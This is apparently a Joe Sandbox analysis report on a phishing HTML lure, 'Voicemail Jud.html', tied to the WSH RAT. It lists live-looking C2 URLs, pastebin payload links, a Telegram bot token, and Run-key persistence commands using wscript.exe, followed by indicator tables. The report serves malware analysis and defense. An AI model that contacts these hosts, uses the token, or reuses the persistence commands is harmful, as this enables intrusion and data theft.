http://masterokrwh.duckdns.org:8426/is-readyI	wscript.exe, 0000000C.00000002.3661089635.00000000035A8000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://masterokrwh.duckdns.org:8426/is-readyWdtP.	wscript.exe, 0000000C.00000002.3661089635.00000000035A8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ip-api.com/json/a	wscript.exe, 0000000B.00000003.2092865617.0000000005A1E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.3662661142.0000000005DCA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000011.00000002.3662635567.00000210134D5000.00000004.00000020.00020000.00000000.sdmp	false		high
http://masterokrwh.duckdns.org:8426/is-readyCreationClassName	wscript.exe, 0000000C.00000003.3228222744.0000000006C75000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.2776519179.0000000006C75000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.3228443840.0000000006C75000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.telegram.org:443/bot6968126468:AAFBucF0UmhmKMp_RgCJWJVC7hjGAO25mwg/sendMessageAccept-Lan	wscript.exe, 00000011.00000002.3663058891.00000210139EA000.00000004.00000020.00020000.00000000.sdmp	false		high
https://pastebin.com:443/raw/NsQ5qTHr	wscript.exe, 00000011.00000002.3663058891.00000210139EA000.00000004.00000020.00020000.00000000.sdmp	false		high
https://pastebin.com/raw/NsQ5qTHr_n	wscript.exe, 0000000B.00000003.2094333401.0000000005F93000.00000004.00000020.00020000.00000000.sdmp	false		high
http://masterokrwh.duckdns.org:8426/is-readyZ	wscript.exe, 0000000C.00000003.3228222744.0000000006C75000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.3408815710.0000000006C75000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.2776519179.0000000006C75000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.2776352925.0000000006CBF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.3228201928.0000000006CC2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.3228443840.0000000006C75000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.3663596969.0000000006C75000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.2484400833.0000000006C75000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://pastebin.com/	wscript.exe, 0000000B.00000002.2097000697.00000000069D0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000011.00000002.3663058891.00000210139C7000.00000004.00000020.00020000.00000000.sdmp	false		high
http://masterokrwh.duckdns.org:8426/is-readyT	wscript.exe, 0000000C.00000002.3661089635.00000000035A8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://json.geo	wscript.exe, 0000000B.00000002.2095763149.000000000351D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.2094811669.000000000351D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.3661710807.00000000038AD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ip-api.com/json/W	wscript.exe, 0000000C.00000003.2776352925.0000000006C83000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.3228222744.0000000006C75000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.3408815710.0000000006C75000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.2479805019.0000000006C84000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.3228443840.0000000006C75000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.3663596969.0000000006C75000.00000004.00000020.00020000.00000000.sdmp	false		high
https://json.geou	wscript.exe, 0000000B.00000003.2094115487.000000000351D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://pastebin.com/raw/NsQ5qTHr(F/t	wscript.exe, 0000000C.00000002.3663596969.0000000006C18000.00000004.00000020.00020000.00000000.sdmp	false		high
http://masterokrwh.duckdns.org:8426/is-readyP	wscript.exe, 0000000C.00000002.3661089635.00000000035A8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ip-api.com/json/ycenter2	wscript.exe, 0000000C.00000003.2776352925.0000000006C83000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.3228222744.0000000006C75000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.3408815710.0000000006C75000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.2479805019.0000000006C84000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.3228443840.0000000006C75000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.3663596969.0000000006C75000.00000004.00000020.00020000.00000000.sdmp	false		high
http://masterokrwh.duckdns.org:8426/is-ready4E	wscript.exe, 0000000C.00000002.3661089635.00000000035A8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
199.232.192.193	ipv4.imgur.map.fastly.net	United States	54113	FASTLYUS	false
172.66.47.2	cloudgoogle.pages.dev	United States	13335	CLOUDFLARENETUS	false
45.133.174.75	masterokrwh.duckdns.org	United Kingdom	207189	ASBLANKPROXIESGB	true
172.66.47.26	unknown	United States	13335	CLOUDFLARENETUS	false
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	false
208.95.112.1	ip-api.com	United States	53334	TUT-ASUS	false
104.21.25.148	json.geoiplookup.io	United States	13335	CLOUDFLARENETUS	true
239.255.255.250	unknown	Reserved	unknown	unknown	false
172.67.19.24	pastebin.com	United States	13335	CLOUDFLARENETUS	false
172.67.162.195	pastie.io	United States	13335	CLOUDFLARENETUS	false
172.217.4.68	www.google.com	United States	15169	GOOGLEUS	false
172.66.44.230	cviocemusikdanxcehal.pages.dev	United States	13335	CLOUDFLARENETUS	false
104.21.235.214	icons.iconarchive.com	United States	13335	CLOUDFLARENETUS	false
104.21.235.213	unknown	United States	13335	CLOUDFLARENETUS	false
104.21.10.93	unknown	United States	13335	CLOUDFLARENETUS	false

Private

IP
192.168.2.4

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1439837
Start date and time:	2024-05-10 21:30:22 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 3s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowshtmlcookbook.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	19
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Voicemail Jud.html
Detection:	MAL
Classification:	mal100.phis.troj.expl.evad.winHTML@44/28@37/16
EGA Information:	Successful, ratio: 33.3%
HCA Information:	Successful, ratio: 100% Number of executed functions: 43 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .html

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 142.250.190.67, 142.250.111.84, 142.250.191.238, 34.104.35.123, 199.232.210.172, 192.229.211.108, 172.217.5.10, 172.217.0.170, 142.250.191.234, 142.250.191.202, 142.250.191.170, 142.250.191.106, 172.217.4.42, 142.250.191.138, 172.217.2.35, 142.250.191.174
Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, update.googleapis.com, clients.l.google.com, optimizationguide-pa.googleapis.com
Execution Graph export aborted for target wscript.exe, PID 1544 because there are no executed function
Execution Graph export aborted for target wscript.exe, PID 7076 because there are no executed function
HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.
VT rate limit hit for: Voicemail Jud.html

Simulations

Behavior and APIs

Time	Type	Description
20:31:57	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run New Voicemail May 9 _mp4 wscript.exe //B "C:\Users\user\AppData\Local\Temp\New Voicemail May 9 _mp4.js"
20:32:05	Autostart	Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run New Voicemail May 9 _mp4 wscript.exe //B "C:\Users\user\AppData\Local\Temp\New Voicemail May 9 _mp4.js"
20:32:13	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run New Voicemail May 9 _mp4 wscript.exe //B "C:\Users\user\AppData\Local\Temp\New Voicemail May 9 _mp4.js"
20:32:22	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\New Voicemail May 9 _mp4.js
21:31:55	API Interceptor	2x Sleep call for process: wscript.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
149.154.167.220	DHL3546.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
	DevxExecutor.exe	Get hash	malicious	Python Stealer, Blank Grabber, CStealer, Discord Token Stealer, Millenuim RAT	Browse
	lzkaYYrJbB.exe	Get hash	malicious	AgentTesla	Browse
	MNhTlD222T.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
	ORDER_INQUIRY_PDF.exe	Get hash	malicious	AgentTesla	Browse
	rREQUESTFORQUOTATION2024.scr.exe	Get hash	malicious	AgentTesla	Browse
	SecuriteInfo.com.Trojan.DownLoader16.37524.18705.18225.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
	Se7CZnlXZZ.exe	Get hash	malicious	AgentTesla, PureLog Stealer, zgRAT	Browse
	vjk2FB3esY.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
	COMPANY PROFILE_pdf.exe	Get hash	malicious	AgentTesla	Browse
199.232.192.193	http://srv212826.hoster-test.ru/hn/spc/#	Get hash	malicious	HTMLPhisher	Browse
	http://bottlenose-basalt-leech.glitch.me/arrang12archspid.html	Get hash	malicious	HTMLPhisher	Browse
	POP Purchase Order (Single).xls.shtml	Get hash	malicious	Unknown	Browse
	PO723-0830-01-R1.Xls.html	Get hash	malicious	HTMLPhisher	Browse
	allurebestofbeauty Invoice and Shipping Docs.Shtml	Get hash	malicious	HTMLPhisher	Browse
	New P0.shtml	Get hash	malicious	HTMLPhisher	Browse
	http://t.co/qNJEUC0iim	Get hash	malicious	Unknown	Browse
	http://rabitsokuhou.2chblog.jp	Get hash	malicious	Unknown	Browse
	Wire Transfer confirmation.shtml	Get hash	malicious	HTMLPhisher	Browse
172.66.47.2	https://collettre-7jk.pages.dev/	Get hash	malicious	HTMLPhisher	Browse
	https://collettre-7jk.pages.dev/	Get hash	malicious	HTMLPhisher	Browse
	https://collettre-7jk.pages.dev/	Get hash	malicious	HTMLPhisher	Browse
	https://collettre-7jk.pages.dev/	Get hash	malicious	HTMLPhisher	Browse
	https://l.wl.co/l?u=http://sme.in/Authenticate.aspx?PageName=https://get-your-onedrive-fi.pages.dev/	Get hash	malicious	Unknown	Browse
	Biolegend Review on New Update Document Distribution Return&Sign.eml	Get hash	malicious	Unknown	Browse
	Biolegend Announcement No.680213 Export Control Checklist DD Slip February 24..eml	Get hash	malicious	HTMLPhisher	Browse
45.133.174.75	Invoice-883973938.js	Get hash	malicious	WSHRAT	Browse	masterokrwh.duckdns.org:8426/is-ready
	Invoice Payment N8977823.js	Get hash	malicious	WSHRAT	Browse	masterokrwh.duckdns.org:8426/is-ready
	Pending_Invoice_Bank_Details_XLSX.js	Get hash	malicious	WSHRAT	Browse	masterokrwh.duckdns.org:8426/is-ready
	Pending_Invoice_Bank_Details_kofce_.JS.js	Get hash	malicious	WSHRAT	Browse	masterokrwh.duckdns.org:8426/is-ready
	Dadebehring PendingInvoiceBankDetails.JS.js	Get hash	malicious	WSHRAT	Browse	masterokrwh.duckdns.org:8426/is-ready
	PendingInvoiceBankDetails.JS.js	Get hash	malicious	WSHRAT	Browse	masterokrwh.duckdns.org:8426/is-ready
	Update on Payment.js	Get hash	malicious	WSHRAT	Browse	masterokrwh.duckdns.org:8426/is-ready
172.66.47.26	https://meihjzidw0caomthdd099teatzijpgxcnsrzbo4blcdevjetx.pages.dev/smart89/	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
json.geoiplookup.io	Invoice-883973938.js	Get hash	malicious	WSHRAT	Browse	172.67.134.82
	Invoice Payment N8977823.js	Get hash	malicious	WSHRAT	Browse	104.21.25.148
	Pending_Invoice_Bank_Details_XLSX.js	Get hash	malicious	WSHRAT	Browse	104.21.25.148
	Pending_Invoice_Bank_Details_kofce_.JS.js	Get hash	malicious	WSHRAT	Browse	104.21.25.148
	2024 9_45_44 p.m..js	Get hash	malicious	WSHRAT	Browse	172.67.134.82
	2024 9_45_44 p.m..js	Get hash	malicious	WSHRAT	Browse	104.21.25.148
	2024 8_35_29 p.m..js	Get hash	malicious	WSHRAT	Browse	172.67.134.82
	2024 8_35_29 p.m..js	Get hash	malicious	Unknown	Browse	172.67.134.82
	Overdue InvoiceDetails of the bank transfer Payment.htm	Get hash	malicious	HTMLPhisher	Browse	172.67.134.82
	https://al2cho69m.pages.dev/	Get hash	malicious	Unknown	Browse	104.21.25.148
ip-api.com	thingsto.doc	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	7xVuUXjY8D.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	PO-20240510.xla.xlsx	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	GbZGM.vbs	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	USD 8800.xls	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	208.95.112.1
	Shipping Advice.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	208.95.112.1
	NFs_76042.msi	Get hash	malicious	PrivateLoader, VMdetect	Browse	208.95.112.1
	DHL3546.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	208.95.112.1
	DHL Shipment Doc_AWB 5092675620.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	208.95.112.1
	DHL Shipment - AWB 3734166170.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	208.95.112.1
icons.iconarchive.com	https://dinamicconsultores.app.questorpublico.com.br/	Get hash	malicious	HTMLPhisher	Browse	104.21.235.214
	https://ipfs.io/ipfs/QmZpUYofo5YMUPjoiE92pyBW6JyW86awNYmrRuj5vTUVJ7/index2new1705.html#ivy@bvz.co.za	Get hash	malicious	HTMLPhisher	Browse	104.21.233.185
	Salary_Increase_Datasheet_Febuary_2023.html	Get hash	malicious	HTMLPhisher	Browse	104.21.233.186
	2022 3%3A17%3A48 p.m..html	Get hash	malicious	HTMLPhisher	Browse	104.21.233.186
	2022 4%3A55%3A04 a.m..html	Get hash	malicious	HTMLPhisher	Browse	104.21.233.185
	Voicemail_Records_8182022 102600 p.m..html	Get hash	malicious	HTMLPhisher	Browse	104.21.233.181
	Voicemail_Records_8262022 93012 am_d240d1d8ea2942099314a76c8532e571.html	Get hash	malicious	HTMLPhisher	Browse	104.21.233.181
	Voicemail_Records_8_24_2022 1_09_01 a.m..html	Get hash	malicious	HTMLPhisher	Browse	104.21.233.182
	Voicemail_Records_8232022 30807 a.m.html	Get hash	malicious	HTMLPhisher	Browse	104.21.233.182
api.telegram.org	DHL3546.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	149.154.167.220
	DevxExecutor.exe	Get hash	malicious	Python Stealer, Blank Grabber, CStealer, Discord Token Stealer, Millenuim RAT	Browse	149.154.167.220
	lzkaYYrJbB.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	MNhTlD222T.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	149.154.167.220
	ORDER_INQUIRY_PDF.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	rREQUESTFORQUOTATION2024.scr.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	SecuriteInfo.com.Trojan.DownLoader16.37524.18705.18225.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	149.154.167.220
	Se7CZnlXZZ.exe	Get hash	malicious	AgentTesla, PureLog Stealer, zgRAT	Browse	149.154.167.220
	vjk2FB3esY.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	149.154.167.220
	COMPANY PROFILE_pdf.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	DHL3546.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	149.154.167.220
	DevxExecutor.exe	Get hash	malicious	Python Stealer, Blank Grabber, CStealer, Discord Token Stealer, Millenuim RAT	Browse	149.154.167.220
	lzkaYYrJbB.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	MNhTlD222T.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	149.154.167.220
	4Qkny6GqTM.exe	Get hash	malicious	Keygroup	Browse	149.154.167.99
	ORDER_INQUIRY_PDF.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	rREQUESTFORQUOTATION2024.scr.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	SecuriteInfo.com.Trojan.DownLoader16.37524.18705.18225.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	149.154.167.220
	Se7CZnlXZZ.exe	Get hash	malicious	AgentTesla, PureLog Stealer, zgRAT	Browse	149.154.167.220
	vjk2FB3esY.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	149.154.167.220
CLOUDFLARENETUS	https://01xz.jimdosite.com	Get hash	malicious	HTMLPhisher	Browse	104.21.82.195
	https://eu-west-1.protection.sophos.com/?d=keysurgical.de&u=aHR0cHM6Ly93d3cua2V5c3VyZ2ljYWwuZGUvSG9tZS9TZWxlY3RMYW5ndWFnZT9sYW5ndWFnZT1lbi1VUyZyZWRpcmVjdFVybD1odHRwczovL2VuZXJncmVlbi5ycy8ud2VsbC1rbm93bi9hY21lLWNoYWxsZW5nZS8=&p=m&i=NjEwYjE2Y2U0Zjc0MWMwZTk2MmNlZjk5&t=OE0wZTk1N0Y5dDJ6N29CQlM3RlRxNW5DbXpKbTRqcWJzeTE0UnZUZXJyTT0=&h=ccb3dc1d93924e5398cb784943bcbc84&s=AVNPUEhUT0NFTkNSWVBUSVaHyS6hqym7qLqtAI_LAX_uaGik92MJH8on0iF38froOA	Get hash	malicious	HTMLPhisher	Browse	104.17.2.184
	mrH7nYSmPU.exe	Get hash	malicious	PrivateLoader, RisePro Stealer	Browse	104.26.5.15
	mrH7nYSmPU.exe	Get hash	malicious	PrivateLoader, RisePro Stealer	Browse	104.26.5.15
	0CmMweT4Wf.exe	Get hash	malicious	LummaC	Browse	172.67.205.94
	https://content.td.org/r/11019?pocc=CERT_CC&TraxPassThrough=https://pibs.hiservers.net/vix/index.html	Get hash	malicious	Unknown	Browse	1.1.1.1
	http://Cerberus-sharedoc.com	Get hash	malicious	Unknown	Browse	172.67.28.250
	http://Cerberus-sharedoc.com	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse	104.17.25.14
	https://ibit.ly/vRhoH	Get hash	malicious	Unknown	Browse	104.17.3.184
	TePd86X60h.exe	Get hash	malicious	LummaC	Browse	104.21.77.72
FASTLYUS	https://01xz.jimdosite.com	Get hash	malicious	HTMLPhisher	Browse	151.101.2.79
	SummaryForm_esjsRkPpIukVFv.zip	Get hash	malicious	AsyncRAT, PureLog Stealer, zgRAT	Browse	199.232.214.172
	https://worker-dark-lab-5c16.al-ltiamet0010.workers.dev/?7hz=test@group.com	Get hash	malicious	HTMLPhisher	Browse	151.101.130.137
	https://vk.com/away.php?to=https://tracker.club-os.com///////campaign/click?msgId=d738c6bd137e6a03157c6c728cbc659e734fc398%26test=false%26target=neoparts.com.br/seyi/2xu1/c3VwcG9ydC5oaXBAZG90Lmdvdg==&$	Get hash	malicious	HTMLPhisher	Browse	151.101.194.137
	https://setopsaccom-my.sharepoint.com/:b:/g/personal/mcolchado_setopsac_com/EdegGaEQdopEuWC71vxM2u8BC1AoyqcAfqM5GjJo_9SU8A?e=4%3a15DEva&at=9&xsdata=MDV8MDJ8bmljb2xlLmNhbXBvc0BzZ3MuY29tfDhkNmZiOTRlOTA4ODQ5Y2E3OTE2MDhkYzZmODNmYjM5fGU5NmZhNzJiYzhkNjQ5NTc5NmJkYzdmOGRjMzBjYzg4fDB8MHw2Mzg1MDc4NTk4Mzk4OTM2NjZ8VW5rbm93bnxUV0ZwYkdac2IzZDhleUpXSWpvaU1DNHdMakF3TURBaUxDSlFJam9pVjJsdU16SWlMQ0pCVGlJNklrMWhhV3dpTENKWFZDSTZNbjA9fDB8fHw%3d&sdata=Uk5oNFRzTUVyNXRpVFNuRWZoaEJRdzhySVlGR1p5NnhBVjQ3aWNGM3ZRZz0%3d	Get hash	malicious	Unknown	Browse	185.199.109.133
	https://rzxt.yeadela.com/1mvQVZ3/	Get hash	malicious	HTMLPhisher	Browse	151.101.194.137
	http://pub.marq.com/34a28a00-9c6a-43a5-9e9d-e8027b355f51	Get hash	malicious	Unknown	Browse	151.101.0.237
	https://krakenfiles.com/	Get hash	malicious	Unknown	Browse	151.101.2.133
	https://g3hmu.eq510.com/xMBT/	Get hash	malicious	HTMLPhisher	Browse	151.101.194.137
ASBLANKPROXIESGB	Invoice-883973938.js	Get hash	malicious	WSHRAT	Browse	45.133.174.75
	Invoice Payment N8977823.js	Get hash	malicious	WSHRAT	Browse	45.133.174.75
	Pending_Invoice_Bank_Details_XLSX.js	Get hash	malicious	WSHRAT	Browse	45.133.174.75
	Pending_Invoice_Bank_Details_kofce_.JS.js	Get hash	malicious	WSHRAT	Browse	45.133.174.75
	Dadebehring PendingInvoiceBankDetails.JS.js	Get hash	malicious	WSHRAT	Browse	45.133.174.75
	PendingInvoiceBankDetails.JS.js	Get hash	malicious	WSHRAT	Browse	45.133.174.75
	Update on Payment.js	Get hash	malicious	WSHRAT	Browse	45.133.174.75
	tqfn0gJpLM.exe	Get hash	malicious	AsyncRAT, PureLog Stealer	Browse	45.133.174.75
	Qzr31SUgrS.rtf	Get hash	malicious	Remcos	Browse	45.133.174.22
	OFFER DETAIL 75645.xls	Get hash	malicious	Remcos	Browse	45.133.174.22
CLOUDFLARENETUS	https://01xz.jimdosite.com	Get hash	malicious	HTMLPhisher	Browse	104.21.82.195
	https://eu-west-1.protection.sophos.com/?d=keysurgical.de&u=aHR0cHM6Ly93d3cua2V5c3VyZ2ljYWwuZGUvSG9tZS9TZWxlY3RMYW5ndWFnZT9sYW5ndWFnZT1lbi1VUyZyZWRpcmVjdFVybD1odHRwczovL2VuZXJncmVlbi5ycy8ud2VsbC1rbm93bi9hY21lLWNoYWxsZW5nZS8=&p=m&i=NjEwYjE2Y2U0Zjc0MWMwZTk2MmNlZjk5&t=OE0wZTk1N0Y5dDJ6N29CQlM3RlRxNW5DbXpKbTRqcWJzeTE0UnZUZXJyTT0=&h=ccb3dc1d93924e5398cb784943bcbc84&s=AVNPUEhUT0NFTkNSWVBUSVaHyS6hqym7qLqtAI_LAX_uaGik92MJH8on0iF38froOA	Get hash	malicious	HTMLPhisher	Browse	104.17.2.184
	mrH7nYSmPU.exe	Get hash	malicious	PrivateLoader, RisePro Stealer	Browse	104.26.5.15
	mrH7nYSmPU.exe	Get hash	malicious	PrivateLoader, RisePro Stealer	Browse	104.26.5.15
	0CmMweT4Wf.exe	Get hash	malicious	LummaC	Browse	172.67.205.94
	https://content.td.org/r/11019?pocc=CERT_CC&TraxPassThrough=https://pibs.hiservers.net/vix/index.html	Get hash	malicious	Unknown	Browse	1.1.1.1
	http://Cerberus-sharedoc.com	Get hash	malicious	Unknown	Browse	172.67.28.250
	http://Cerberus-sharedoc.com	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse	104.17.25.14
	https://ibit.ly/vRhoH	Get hash	malicious	Unknown	Browse	104.17.3.184
	TePd86X60h.exe	Get hash	malicious	LummaC	Browse	104.21.77.72

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
28a2c9bd18a11de089ef85a160da29e4	http://Cerberus-sharedoc.com	Get hash	malicious	Unknown	Browse	23.221.246.93 20.12.23.50
	https://ibit.ly/vRhoH	Get hash	malicious	Unknown	Browse	23.221.246.93 20.12.23.50
	http://link.csrwire.com/ls/click?upn=u001.Si0DiArC1V8ZAnBzMk9-2BdVKW245QccVJHq5a8ac9PL1cxKEohrdYzj-2Bi8X2xywdF5x014kxhAPztuH7dRixzSCWE-2BJwchVhYZ74Ivk5CnEAPFl7yJBY43wNoXEBfuRY7zCLn7IFjGzLO2VDHwzMa6b1dQgFTMqVrhr7lYKJs9qSYs-2BIWqneYUpThOMtW8ZRR6Iy8ZluudY9oUF69ErkVqCFsCdS9PQdzgcwXeeOj6ZKV22HkdSZ8a2BtOkIwa8f5RXVVDG-2FZ4Tjk8EmmBNiUIJEg0D5Xhe9ZQ57qy-2BBAKnYhCs-2FX2ay-2BUG9X1hUYA5fYM3Z-_pYzszJtWvDo4XrPcIrPEj-2FfLRiscg7jJfoOh-2FPfOv-2FAqPi0uLUcGyBdzRdsUZJVEsUYrxMVvEbbsL7wbRHe2oe4LWkg8e50pd910Pzc7iWq3Z6cLQrtyam15B-2FHtpNbfS-2F-2FwyAD0IxTQRHbbOZT4bmkevKCyiXa3Rppr-2BL2ILAXZtSMjpjMo9KXeJPssmKH1S-2FeOXFZJONW6iLeJUXVTRnLkVzUX-2F6Mnbd9TRe3mn20-3D	Get hash	malicious	HTMLPhisher	Browse	23.221.246.93 20.12.23.50
	https://jongordon.com/books/	Get hash	malicious	Unknown	Browse	23.221.246.93 20.12.23.50
	https://setopsaccom-my.sharepoint.com/:b:/g/personal/mcolchado_setopsac_com/EdegGaEQdopEuWC71vxM2u8BC1AoyqcAfqM5GjJo_9SU8A?e=4%3a15DEva&at=9&xsdata=MDV8MDJ8bmljb2xlLmNhbXBvc0BzZ3MuY29tfDhkNmZiOTRlOTA4ODQ5Y2E3OTE2MDhkYzZmODNmYjM5fGU5NmZhNzJiYzhkNjQ5NTc5NmJkYzdmOGRjMzBjYzg4fDB8MHw2Mzg1MDc4NTk4Mzk4OTM2NjZ8VW5rbm93bnxUV0ZwYkdac2IzZDhleUpXSWpvaU1DNHdMakF3TURBaUxDSlFJam9pVjJsdU16SWlMQ0pCVGlJNklrMWhhV3dpTENKWFZDSTZNbjA9fDB8fHw%3d&sdata=Uk5oNFRzTUVyNXRpVFNuRWZoaEJRdzhySVlGR1p5NnhBVjQ3aWNGM3ZRZz0%3d	Get hash	malicious	Unknown	Browse	23.221.246.93 20.12.23.50
	https://rzxt.yeadela.com/1mvQVZ3/	Get hash	malicious	HTMLPhisher	Browse	23.221.246.93 20.12.23.50
	https://1158563107.incognitoviewer.org/	Get hash	malicious	Unknown	Browse	23.221.246.93 20.12.23.50
	http://summitplatform.top	Get hash	malicious	Unknown	Browse	23.221.246.93 20.12.23.50
	https://krakenfiles.com/	Get hash	malicious	Unknown	Browse	23.221.246.93 20.12.23.50
a0e9f5d64349fb13191bc781f81f42e1	mrH7nYSmPU.exe	Get hash	malicious	PrivateLoader, RisePro Stealer	Browse	172.67.19.24 149.154.167.220
	mrH7nYSmPU.exe	Get hash	malicious	PrivateLoader, RisePro Stealer	Browse	172.67.19.24 149.154.167.220
	0CmMweT4Wf.exe	Get hash	malicious	LummaC	Browse	172.67.19.24 149.154.167.220
	TePd86X60h.exe	Get hash	malicious	LummaC	Browse	172.67.19.24 149.154.167.220
	jHLijDfFFA.exe	Get hash	malicious	LummaC	Browse	172.67.19.24 149.154.167.220
	nMkQ2yFWe4.exe	Get hash	malicious	PrivateLoader, RisePro Stealer	Browse	172.67.19.24 149.154.167.220
	nMkQ2yFWe4.exe	Get hash	malicious	PrivateLoader, RisePro Stealer	Browse	172.67.19.24 149.154.167.220
	NFs_76042.msi	Get hash	malicious	PrivateLoader, VMdetect	Browse	172.67.19.24 149.154.167.220
	Purchase Order is approved20240509.cmd	Get hash	malicious	DBatLoader	Browse	172.67.19.24 149.154.167.220
	feeding_book_2024_60Hz_R00.exe	Get hash	malicious	PrivateLoader	Browse	172.67.19.24 149.154.167.220
37f463bf4616ecd445d4a1937da06e19	file.exe	Get hash	malicious	PrivateLoader, Vidar	Browse	104.21.25.148
	INV_#016789.vbs	Get hash	malicious	Unknown	Browse	104.21.25.148
	uLBFBa5ZvB.exe	Get hash	malicious	Latrodectus	Browse	104.21.25.148
	verycuteflowerpictureimage.jpg.vbs	Get hash	malicious	Unknown	Browse	104.21.25.148
